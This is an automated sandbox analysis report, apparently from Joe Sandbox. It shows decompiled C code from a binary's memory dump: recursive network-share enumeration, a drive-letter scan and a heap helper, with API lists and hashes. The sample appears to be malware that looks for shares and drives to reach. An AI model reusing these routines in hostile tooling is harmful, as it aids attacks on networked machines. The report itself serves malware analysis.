                                                                                                    • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                    • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
                                                                                                    				char _v8;
                                                                                                    				signed int _v16;
                                                                                                    				intOrPtr _v24;
                                                                                                    				signed int _v28;
                                                                                                    				char _v44;
                                                                                                    				intOrPtr _v48;
                                                                                                    				signed int _v52;
                                                                                                    				char _v68;
                                                                                                    				intOrPtr _v72;
                                                                                                    				signed int _v76;
                                                                                                    				char _v92;
                                                                                                    				intOrPtr _v96;
                                                                                                    				int _v100;
                                                                                                    				char _v116;
                                                                                                    				signed int _v120;
                                                                                                    				intOrPtr _v124;
                                                                                                    				intOrPtr _v128;
                                                                                                    				char _v132;
                                                                                                    				signed int _v136;
                                                                                                    				signed int _v140;
                                                                                                    				void* _v144;
                                                                                                    				struct _NETRESOURCE* _v148;
                                                                                                    				signed int _v152;
                                                                                                    				void* _v156;
                                                                                                    				int _v160;
                                                                                                    				int _v164;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				signed int _t88;
                                                                                                    				signed int _t89;
                                                                                                    				signed int _t91;
                                                                                                    				intOrPtr _t103;
                                                                                                    				void* _t107;
                                                                                                    				signed int _t110;
                                                                                                    				signed int _t111;
                                                                                                    				signed int _t112;
                                                                                                    				signed int _t114;
                                                                                                    				signed int _t116;
                                                                                                    				signed int _t118;
                                                                                                    				void* _t122;
                                                                                                    				signed int _t124;
                                                                                                    				signed int _t127;
                                                                                                    				struct _NETRESOURCE* _t129;
                                                                                                    				signed int _t131;
                                                                                                    				signed int _t135;
                                                                                                    				signed int _t136;
                                                                                                    				signed int _t139;
                                                                                                    				signed int _t140;
                                                                                                    				signed int _t141;
                                                                                                    				signed int _t142;
                                                                                                    				signed int _t143;
                                                                                                    				signed int _t144;
                                                                                                    				signed int _t145;
                                                                                                    				signed int _t146;
                                                                                                    				signed int _t147;
                                                                                                    				signed int _t148;
                                                                                                    				signed int _t151;
                                                                                                    				signed int _t152;
                                                                                                    				signed int _t153;
                                                                                                    				signed int _t154;
                                                                                                    				signed int _t161;
                                                                                                    				intOrPtr* _t164;
                                                                                                    				signed int _t167;
                                                                                                    				signed int _t168;
                                                                                                    				void* _t169;
                                                                                                    
                                                                                                    				_t129 = __ecx;
                                                                                                    				_t168 = _t167 & 0xfffffff8;
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4cabd6);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t168;
                                                                                                    				_t169 = _t168 - 0x98;
                                                                                                    				_v164 = 0x4000;
                                                                                                    				_t164 = __edx;
                                                                                                    				_v160 = 0xffffffff;
                                                                                                    				if(WNetOpenEnumW(2, 0, 0, __ecx,  &_v156) == 0) {
                                                                                                    					_t122 = GlobalAlloc(0x40, _v164);
                                                                                                    					_v144 = _t122;
                                                                                                    					while(1) {
                                                                                                    						E0042B420(_t122, 0, _v164);
                                                                                                    						_t169 = _t169 + 0xc;
                                                                                                    						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164);
                                                                                                    						__eflags = _t88;
                                                                                                    						if(_t88 != 0) {
                                                                                                    							break;
                                                                                                    						}
                                                                                                    						_v148 = _t88;
                                                                                                    						__eflags = _v160 - _t88;
                                                                                                    						if(_v160 > _t88) {
                                                                                                    							_t124 = _t122 + 0x10;
                                                                                                    							__eflags = _t124;
                                                                                                    							_v152 = _t124;
                                                                                                    							do {
                                                                                                    								_v96 = 7;
                                                                                                    								_v100 = 0;
                                                                                                    								_v116 = 0;
                                                                                                    								_v72 = 7;
                                                                                                    								_v76 = 0;
                                                                                                    								_v92 = 0;
                                                                                                    								_v48 = 7;
                                                                                                    								_v52 = 0;
                                                                                                    								_v68 = 0;
                                                                                                    								_v24 = 7;
                                                                                                    								_v28 = 0;
                                                                                                    								_v44 = 0;
                                                                                                    								_v8 = 0;
                                                                                                    								_t151 =  *_t124;
                                                                                                    								_v132 =  *((intOrPtr*)(_t124 - 0x10));
                                                                                                    								_v128 =  *((intOrPtr*)(_t124 - 0xc));
                                                                                                    								_v124 =  *((intOrPtr*)(_t124 - 8));
                                                                                                    								_v120 =  *(_t124 - 4);
                                                                                                    								__eflags = _t151;
                                                                                                    								if(_t151 != 0) {
                                                                                                    									__eflags =  *_t151;
                                                                                                    									if( *_t151 != 0) {
                                                                                                    										_t146 = _t151;
                                                                                                    										_t161 = _t146 + 2;
                                                                                                    										do {
                                                                                                    											_t118 =  *_t146;
                                                                                                    											_t146 = _t146 + 2;
                                                                                                    											__eflags = _t118;
                                                                                                    										} while (_t118 != 0);
                                                                                                    										_t147 = _t146 - _t161;
                                                                                                    										__eflags = _t147;
                                                                                                    										_t148 = _t147 >> 1;
                                                                                                    									} else {
                                                                                                    										_t148 = 0;
                                                                                                    									}
                                                                                                    									_push(_t148);
                                                                                                    									_t129 =  &_v116;
                                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t151);
                                                                                                    								}
                                                                                                    								_t152 =  *(_t124 + 4);
                                                                                                    								__eflags = _t152;
                                                                                                    								if(_t152 != 0) {
                                                                                                    									__eflags =  *_t152;
                                                                                                    									if( *_t152 != 0) {
                                                                                                    										_t143 = _t152;
                                                                                                    										_t38 = _t143 + 2; // 0x72
                                                                                                    										_t161 = _t38;
                                                                                                    										do {
                                                                                                    											_t116 =  *_t143;
                                                                                                    											_t143 = _t143 + 2;
                                                                                                    											__eflags = _t116;
                                                                                                    										} while (_t116 != 0);
                                                                                                    										_t144 = _t143 - _t161;
                                                                                                    										__eflags = _t144;
                                                                                                    										_t145 = _t144 >> 1;
                                                                                                    									} else {
                                                                                                    										_t145 = 0;
                                                                                                    									}
                                                                                                    									_push(_t145);
                                                                                                    									_t129 =  &_v92;
                                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t152);
                                                                                                    								}
                                                                                                    								_t153 =  *(_t124 + 8);
                                                                                                    								__eflags = _t153;
                                                                                                    								if(_t153 != 0) {
                                                                                                    									__eflags =  *_t153;
                                                                                                    									if( *_t153 != 0) {
                                                                                                    										_t140 = _t153;
                                                                                                    										_t161 = _t140 + 2;
                                                                                                    										do {
                                                                                                    											_t114 =  *_t140;
                                                                                                    											_t140 = _t140 + 2;
                                                                                                    											__eflags = _t114;
                                                                                                    										} while (_t114 != 0);
                                                                                                    										_t141 = _t140 - _t161;
                                                                                                    										__eflags = _t141;
                                                                                                    										_t142 = _t141 >> 1;
                                                                                                    									} else {
                                                                                                    										_t142 = 0;
                                                                                                    									}
                                                                                                    									_push(_t142);
                                                                                                    									_t129 =  &_v68;
                                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t153);
                                                                                                    								}
                                                                                                    								_t154 =  *(_t124 + 0xc);
                                                                                                    								__eflags = _t154;
                                                                                                    								if(_t154 != 0) {
                                                                                                    									__eflags =  *_t154;
                                                                                                    									if( *_t154 != 0) {
                                                                                                    										_t110 = _t154;
                                                                                                    										_t161 = _t110 + 2;
                                                                                                    										do {
                                                                                                    											_t139 =  *_t110;
                                                                                                    											_t110 = _t110 + 2;
                                                                                                    											__eflags = _t139;
                                                                                                    										} while (_t139 != 0);
                                                                                                    										_t111 = _t110 - _t161;
                                                                                                    										__eflags = _t111;
                                                                                                    										_t112 = _t111 >> 1;
                                                                                                    									} else {
                                                                                                    										_t112 = 0;
                                                                                                    									}
                                                                                                    									_push(_t112);
                                                                                                    									_t129 =  &_v44;
                                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t154);
                                                                                                    								}
                                                                                                    								_t161 =  *(_t164 + 4);
                                                                                                    								__eflags =  &_v132 - _t161;
                                                                                                    								if( &_v132 >= _t161) {
                                                                                                    									L41:
                                                                                                    									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
                                                                                                    									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
                                                                                                    										_push(_t129);
                                                                                                    										E004150C0(_t124, _t164, _t161, _t164);
                                                                                                    									}
                                                                                                    									_t131 =  *(_t164 + 4);
                                                                                                    									_v140 = _t131;
                                                                                                    									_v136 = _t131;
                                                                                                    									_v8 = 2;
                                                                                                    									__eflags = _t131;
                                                                                                    									if(__eflags != 0) {
                                                                                                    										E00418FD0(_t131, __eflags,  &_v132);
                                                                                                    									}
                                                                                                    								} else {
                                                                                                    									_t103 =  *_t164;
                                                                                                    									_t129 =  &_v132;
                                                                                                    									__eflags = _t103 - _t129;
                                                                                                    									if(_t103 > _t129) {
                                                                                                    										goto L41;
                                                                                                    									} else {
                                                                                                    										_t135 = _t129 - _t103;
                                                                                                    										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
                                                                                                    										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
                                                                                                    										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
                                                                                                    											_push(_t135);
                                                                                                    											E004150C0(_t127, _t164, _t161, _t164);
                                                                                                    										}
                                                                                                    										_t136 =  *(_t164 + 4);
                                                                                                    										_v136 = _t136;
                                                                                                    										_v140 = _t136;
                                                                                                    										_t107 = _t127 * 0x70 +  *_t164;
                                                                                                    										_v8 = 1;
                                                                                                    										__eflags = _t136;
                                                                                                    										if(__eflags != 0) {
                                                                                                    											E00418FD0(_t136, __eflags, _t107);
                                                                                                    										}
                                                                                                    										_t124 = _v152;
                                                                                                    									}
                                                                                                    								}
                                                                                                    								_v8 = 0;
                                                                                                    								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
                                                                                                    								__eflags =  *(_t124 - 4) & 0x00000002;
                                                                                                    								if(( *(_t124 - 4) & 0x00000002) != 0) {
                                                                                                    									_t71 = _t124 - 0x10; // -16
                                                                                                    									E00410BD0(_t71, _t164);
                                                                                                    								}
                                                                                                    								_v8 = 0xffffffff;
                                                                                                    								E00410F20( &_v132);
                                                                                                    								_t124 = _t124 + 0x20;
                                                                                                    								_t129 = _v148 + 1;
                                                                                                    								_v152 = _t124;
                                                                                                    								_v148 = _t129;
                                                                                                    								__eflags = _t129 - _v160;
                                                                                                    							} while (_t129 < _v160);
                                                                                                    							_t122 = _v144;
                                                                                                    						}
                                                                                                    					}
                                                                                                    					_t89 = WNetCloseEnum(_v156);
                                                                                                    					asm("sbb eax, eax");
                                                                                                    					 *[fs:0x0] = _v16;
                                                                                                    					_t91 =  ~_t89 + 1;
                                                                                                    					__eflags = _t91;
                                                                                                    					return _t91;
                                                                                                    				} else {
                                                                                                    					 *[fs:0x0] = _v16;
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    			}






































































                                                                                                    0x00410bd0
                                                                                                    0x00410bd3
                                                                                                    0x00410bd6
                                                                                                    0x00410bd8
                                                                                                    0x00410be3
                                                                                                    0x00410be4
                                                                                                    0x00410beb
                                                                                                    0x00410bf8
                                                                                                    0x00410c08
                                                                                                    0x00410c0a
                                                                                                    0x00410c1a
                                                                                                    0x00410c3f
                                                                                                    0x00410c41
                                                                                                    0x00410c45
                                                                                                    0x00410c4c
                                                                                                    0x00410c51
                                                                                                    0x00410c63
                                                                                                    0x00410c69
                                                                                                    0x00410c6b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410c71
                                                                                                    0x00410c75
                                                                                                    0x00410c79
                                                                                                    0x00410c7b
                                                                                                    0x00410c7b
                                                                                                    0x00410c7e
                                                                                                    0x00410c82
                                                                                                    0x00410c84
                                                                                                    0x00410c8c
                                                                                                    0x00410c94
                                                                                                    0x00410c99
                                                                                                    0x00410ca1
                                                                                                    0x00410ca5
                                                                                                    0x00410caa
                                                                                                    0x00410cb5
                                                                                                    0x00410cbc
                                                                                                    0x00410cc1
                                                                                                    0x00410ccc
                                                                                                    0x00410cd3
                                                                                                    0x00410cdb
                                                                                                    0x00410ce5
                                                                                                    0x00410ce7
                                                                                                    0x00410cee
                                                                                                    0x00410cf5
                                                                                                    0x00410cfc
                                                                                                    0x00410d00
                                                                                                    0x00410d02
                                                                                                    0x00410d04
                                                                                                    0x00410d08
                                                                                                    0x00410d0e
                                                                                                    0x00410d10
                                                                                                    0x00410d13
                                                                                                    0x00410d13
                                                                                                    0x00410d16
                                                                                                    0x00410d19
                                                                                                    0x00410d19
                                                                                                    0x00410d1e
                                                                                                    0x00410d1e
                                                                                                    0x00410d20
                                                                                                    0x00410d0a
                                                                                                    0x00410d0a
                                                                                                    0x00410d0a
                                                                                                    0x00410d22
                                                                                                    0x00410d24
                                                                                                    0x00410d28
                                                                                                    0x00410d28
                                                                                                    0x00410d2d
                                                                                                    0x00410d30
                                                                                                    0x00410d32
                                                                                                    0x00410d34
                                                                                                    0x00410d38
                                                                                                    0x00410d3e
                                                                                                    0x00410d40
                                                                                                    0x00410d40
                                                                                                    0x00410d43
                                                                                                    0x00410d43
                                                                                                    0x00410d46
                                                                                                    0x00410d49
                                                                                                    0x00410d49
                                                                                                    0x00410d4e
                                                                                                    0x00410d4e
                                                                                                    0x00410d50
                                                                                                    0x00410d3a
                                                                                                    0x00410d3a
                                                                                                    0x00410d3a
                                                                                                    0x00410d52
                                                                                                    0x00410d54
                                                                                                    0x00410d58
                                                                                                    0x00410d58
                                                                                                    0x00410d5d
                                                                                                    0x00410d60
                                                                                                    0x00410d62
                                                                                                    0x00410d64
                                                                                                    0x00410d68
                                                                                                    0x00410d6e
                                                                                                    0x00410d70
                                                                                                    0x00410d73
                                                                                                    0x00410d73
                                                                                                    0x00410d76
                                                                                                    0x00410d79
                                                                                                    0x00410d79
                                                                                                    0x00410d7e
                                                                                                    0x00410d7e
                                                                                                    0x00410d80
                                                                                                    0x00410d6a
                                                                                                    0x00410d6a
                                                                                                    0x00410d6a
                                                                                                    0x00410d82
                                                                                                    0x00410d84
                                                                                                    0x00410d88
                                                                                                    0x00410d88
                                                                                                    0x00410d8d
                                                                                                    0x00410d90
                                                                                                    0x00410d92
                                                                                                    0x00410d94
                                                                                                    0x00410d98
                                                                                                    0x00410d9e
                                                                                                    0x00410da0
                                                                                                    0x00410da3
                                                                                                    0x00410da3
                                                                                                    0x00410da6
                                                                                                    0x00410da9
                                                                                                    0x00410da9
                                                                                                    0x00410dae
                                                                                                    0x00410dae
                                                                                                    0x00410db0
                                                                                                    0x00410d9a
                                                                                                    0x00410d9a
                                                                                                    0x00410d9a
                                                                                                    0x00410db2
                                                                                                    0x00410db4
                                                                                                    0x00410dbb
                                                                                                    0x00410dbb
                                                                                                    0x00410dc0
                                                                                                    0x00410dc7
                                                                                                    0x00410dc9
                                                                                                    0x00410e1f
                                                                                                    0x00410e1f
                                                                                                    0x00410e22
                                                                                                    0x00410e24
                                                                                                    0x00410e27
                                                                                                    0x00410e27
                                                                                                    0x00410e2c
                                                                                                    0x00410e2f
                                                                                                    0x00410e33
                                                                                                    0x00410e37
                                                                                                    0x00410e3f
                                                                                                    0x00410e41
                                                                                                    0x00410e48
                                                                                                    0x00410e48
                                                                                                    0x00410dcb
                                                                                                    0x00410dcb
                                                                                                    0x00410dcd
                                                                                                    0x00410dd1
                                                                                                    0x00410dd3
                                                                                                    0x00000000
                                                                                                    0x00410dd5
                                                                                                    0x00410dd5
                                                                                                    0x00410de8
                                                                                                    0x00410dea
                                                                                                    0x00410ded
                                                                                                    0x00410def
                                                                                                    0x00410df2
                                                                                                    0x00410df2
                                                                                                    0x00410df7
                                                                                                    0x00410dfd
                                                                                                    0x00410e01
                                                                                                    0x00410e05
                                                                                                    0x00410e07
                                                                                                    0x00410e0f
                                                                                                    0x00410e11
                                                                                                    0x00410e14
                                                                                                    0x00410e14
                                                                                                    0x00410e19
                                                                                                    0x00410e19
                                                                                                    0x00410dd3
                                                                                                    0x00410e4d
                                                                                                    0x00410e55
                                                                                                    0x00410e59
                                                                                                    0x00410e60
                                                                                                    0x00410e64
                                                                                                    0x00410e67
                                                                                                    0x00410e67
                                                                                                    0x00410e70
                                                                                                    0x00410e7b
                                                                                                    0x00410e84
                                                                                                    0x00410e87
                                                                                                    0x00410e88
                                                                                                    0x00410e8c
                                                                                                    0x00410e90
                                                                                                    0x00410e90
                                                                                                    0x00410e9a
                                                                                                    0x00410e9a
                                                                                                    0x00410c79
                                                                                                    0x00410ea7
                                                                                                    0x00410eb7
                                                                                                    0x00410eb9
                                                                                                    0x00410ec1
                                                                                                    0x00410ec1
                                                                                                    0x00410ec6
                                                                                                    0x00410c1c
                                                                                                    0x00410c25
                                                                                                    0x00410c32
                                                                                                    0x00410c32

                                                                                                    APIs
                                                                                                    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                    • _memset.LIBCMT ref: 00410C4C
                                                                                                    • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 364255426-0
                                                                                                    • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                    • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                    • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                    • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 58%
                                                                                                    			E00410A50(char __ecx) {
                                                                                                    				signed int _v16;
                                                                                                    				char _v28;
                                                                                                    				intOrPtr _v48;
                                                                                                    				char _v52;
                                                                                                    				intOrPtr _v56;
                                                                                                    				void* _v60;
                                                                                                    				char _v64;
                                                                                                    				char _v68;
                                                                                                    				char _v76;
                                                                                                    				unsigned int _v80;
                                                                                                    				char _v84;
                                                                                                    				unsigned int _v88;
                                                                                                    				char _v89;
                                                                                                    				intOrPtr _v96;
                                                                                                    				intOrPtr _v101;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				unsigned int _t35;
                                                                                                    				int _t39;
                                                                                                    				int _t40;
                                                                                                    				int _t45;
                                                                                                    				void* _t48;
                                                                                                    				signed int _t52;
                                                                                                    				char* _t63;
                                                                                                    				signed int _t74;
                                                                                                    				signed int _t75;
                                                                                                    				void* _t76;
                                                                                                    				char* _t77;
                                                                                                    
                                                                                                    				_t75 = _t74 & 0xfffffff8;
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4cab90);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t75;
                                                                                                    				_t76 = _t75 - 0x48;
                                                                                                    				_push(_t72);
                                                                                                    				_push(_t70);
                                                                                                    				_v76 = __ecx;
                                                                                                    				_t35 = GetLogicalDrives();
                                                                                                    				_v80 = _t35;
                                                                                                    				_t52 = 0;
                                                                                                    				do {
                                                                                                    					if((_t35 >> _t52 & 0x00000001) == 0) {
                                                                                                    						goto L11;
                                                                                                    					}
                                                                                                    					_push(1);
                                                                                                    					_v48 = 0xf;
                                                                                                    					_v52 = 0;
                                                                                                    					_v68 = 0;
                                                                                                    					E004156D0(_t52,  &_v68, _t70, " ");
                                                                                                    					_v16 = 0;
                                                                                                    					_t10 = _t52 + 0x41; // 0x41
                                                                                                    					_push(2);
                                                                                                    					_t59 =  >=  ? _v76 :  &_v76;
                                                                                                    					 *( >=  ? _v76 :  &_v76) = _t10;
                                                                                                    					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
                                                                                                    					_t39 = SetErrorMode(1);
                                                                                                    					_t70 = _t39;
                                                                                                    					_t62 =  >=  ? _v84 :  &_v84;
                                                                                                    					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84);
                                                                                                    					_t72 = _t40;
                                                                                                    					SetErrorMode(_t39);
                                                                                                    					if(_t40 != 0) {
                                                                                                    						_t44 =  >=  ? _v76 :  &_v76;
                                                                                                    						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76);
                                                                                                    						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
                                                                                                    							_t77 = _t76 - 0x18;
                                                                                                    							_v89 = 0;
                                                                                                    							_t63 = _t77;
                                                                                                    							_push(0xffffffff);
                                                                                                    							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
                                                                                                    							 *((intOrPtr*)(_t63 + 0x10)) = 0;
                                                                                                    							 *_t63 = 0;
                                                                                                    							E00413FF0(_t52, _t63,  &_v76, 0);
                                                                                                    							_t48 = E00412900( &_v64, _v101);
                                                                                                    							_t76 = _t77 + 0x18;
                                                                                                    							_v28 = 1;
                                                                                                    							E00413580(_t52, _v96, _t48);
                                                                                                    							if(_v48 >= 8) {
                                                                                                    								L00422587(_v56);
                                                                                                    								_t76 = _t76 + 4;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    					_v16 = 0xffffffff;
                                                                                                    					if(_v56 >= 0x10) {
                                                                                                    						L00422587(_v76);
                                                                                                    						_t76 = _t76 + 4;
                                                                                                    					}
                                                                                                    					_t35 = _v88;
                                                                                                    					L11:
                                                                                                    					_t52 = _t52 + 1;
                                                                                                    				} while (_t52 < 0x1a);
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return _t35;
                                                                                                    			}
































                                                                                                    0x00410a53
                                                                                                    0x00410a56
                                                                                                    0x00410a58
                                                                                                    0x00410a63
                                                                                                    0x00410a64
                                                                                                    0x00410a6b
                                                                                                    0x00410a6f
                                                                                                    0x00410a70
                                                                                                    0x00410a71
                                                                                                    0x00410a75
                                                                                                    0x00410a7b
                                                                                                    0x00410a7f
                                                                                                    0x00410a81
                                                                                                    0x00410a8a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410a90
                                                                                                    0x00410a9b
                                                                                                    0x00410aa3
                                                                                                    0x00410aab
                                                                                                    0x00410ab0
                                                                                                    0x00410ab5
                                                                                                    0x00410ac6
                                                                                                    0x00410ac9
                                                                                                    0x00410acb
                                                                                                    0x00410ad5
                                                                                                    0x00410adb
                                                                                                    0x00410ae2
                                                                                                    0x00410af1
                                                                                                    0x00410af3
                                                                                                    0x00410af9
                                                                                                    0x00410b00
                                                                                                    0x00410b02
                                                                                                    0x00410b0a
                                                                                                    0x00410b15
                                                                                                    0x00410b1b
                                                                                                    0x00410b24
                                                                                                    0x00410b30
                                                                                                    0x00410b33
                                                                                                    0x00410b38
                                                                                                    0x00410b3e
                                                                                                    0x00410b42
                                                                                                    0x00410b49
                                                                                                    0x00410b51
                                                                                                    0x00410b54
                                                                                                    0x00410b61
                                                                                                    0x00410b66
                                                                                                    0x00410b6e
                                                                                                    0x00410b73
                                                                                                    0x00410b7d
                                                                                                    0x00410b83
                                                                                                    0x00410b88
                                                                                                    0x00410b88
                                                                                                    0x00410b7d
                                                                                                    0x00410b24
                                                                                                    0x00410b8b
                                                                                                    0x00410b98
                                                                                                    0x00410b9e
                                                                                                    0x00410ba3
                                                                                                    0x00410ba3
                                                                                                    0x00410ba6
                                                                                                    0x00410baa
                                                                                                    0x00410baa
                                                                                                    0x00410bab
                                                                                                    0x00410bba
                                                                                                    0x00410bc5

                                                                                                    APIs
                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                    • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                    • String ID:
                                                                                                    • API String ID: 2560635915-0
                                                                                                    • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                    • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                    • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                    • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 96%
                                                                                                    			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                                                    				void* _t7;
                                                                                                    				long _t8;
                                                                                                    				intOrPtr* _t9;
                                                                                                    				intOrPtr* _t12;
                                                                                                    				long _t20;
                                                                                                    				long _t31;
                                                                                                    
                                                                                                    				if(_a4 != 0) {
                                                                                                    					_t31 = _a8;
                                                                                                    					__eflags = _t31;
                                                                                                    					if(_t31 != 0) {
                                                                                                    						_push(__ebx);
                                                                                                    						while(1) {
                                                                                                    							__eflags = _t31 - 0xffffffe0;
                                                                                                    							if(_t31 > 0xffffffe0) {
                                                                                                    								break;
                                                                                                    							}
                                                                                                    							__eflags = _t31;
                                                                                                    							if(_t31 == 0) {
                                                                                                    								_t31 = _t31 + 1;
                                                                                                    								__eflags = _t31;
                                                                                                    							}
                                                                                                    							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
                                                                                                    							_t20 = _t7;
                                                                                                    							__eflags = _t20;
                                                                                                    							if(_t20 != 0) {
                                                                                                    								L17:
                                                                                                    								_t8 = _t20;
                                                                                                    							} else {
                                                                                                    								__eflags =  *0x510ab0 - _t7;
                                                                                                    								if(__eflags == 0) {
                                                                                                    									_t9 = E00425208(__eflags);
                                                                                                    									 *_t9 = E00425261(GetLastError());
                                                                                                    									goto L17;
                                                                                                    								} else {
                                                                                                    									__eflags = E0042793D(_t7, _t31);
                                                                                                    									if(__eflags == 0) {
                                                                                                    										_t12 = E00425208(__eflags);
                                                                                                    										 *_t12 = E00425261(GetLastError());
                                                                                                    										L12:
                                                                                                    										_t8 = 0;
                                                                                                    										__eflags = 0;
                                                                                                    									} else {
                                                                                                    										continue;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							}
                                                                                                    							goto L14;
                                                                                                    						}
                                                                                                    						E0042793D(_t6, _t31);
                                                                                                    						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
                                                                                                    						goto L12;
                                                                                                    					} else {
                                                                                                    						E00420BED(_a4);
                                                                                                    						_t8 = 0;
                                                                                                    					}
                                                                                                    					L14:
                                                                                                    					return _t8;
                                                                                                    				} else {
                                                                                                    					return E00420C62(__ebx, __edx, __edi, _a8);
                                                                                                    				}
                                                                                                    			}









                                                                                                    0x0043b706
                                                                                                    0x0043b714
                                                                                                    0x0043b717
                                                                                                    0x0043b719
                                                                                                    0x0043b728
                                                                                                    0x0043b75b
                                                                                                    0x0043b75b
                                                                                                    0x0043b75e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043b72b
                                                                                                    0x0043b72d
                                                                                                    0x0043b72f
                                                                                                    0x0043b72f
                                                                                                    0x0043b72f
                                                                                                    0x0043b73c
                                                                                                    0x0043b742
                                                                                                    0x0043b744
                                                                                                    0x0043b746
                                                                                                    0x0043b7a6
                                                                                                    0x0043b7a6
                                                                                                    0x0043b748
                                                                                                    0x0043b748
                                                                                                    0x0043b74e
                                                                                                    0x0043b790
                                                                                                    0x0043b7a4
                                                                                                    0x00000000
                                                                                                    0x0043b750
                                                                                                    0x0043b757
                                                                                                    0x0043b759
                                                                                                    0x0043b778
                                                                                                    0x0043b78c
                                                                                                    0x0043b772
                                                                                                    0x0043b772
                                                                                                    0x0043b772
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043b759
                                                                                                    0x0043b74e
                                                                                                    0x00000000
                                                                                                    0x0043b774
                                                                                                    0x0043b761
                                                                                                    0x0043b76c
                                                                                                    0x00000000
                                                                                                    0x0043b71b
                                                                                                    0x0043b71e
                                                                                                    0x0043b724
                                                                                                    0x0043b724
                                                                                                    0x0043b775
                                                                                                    0x0043b777
                                                                                                    0x0043b708
                                                                                                    0x0043b712
                                                                                                    0x0043b712

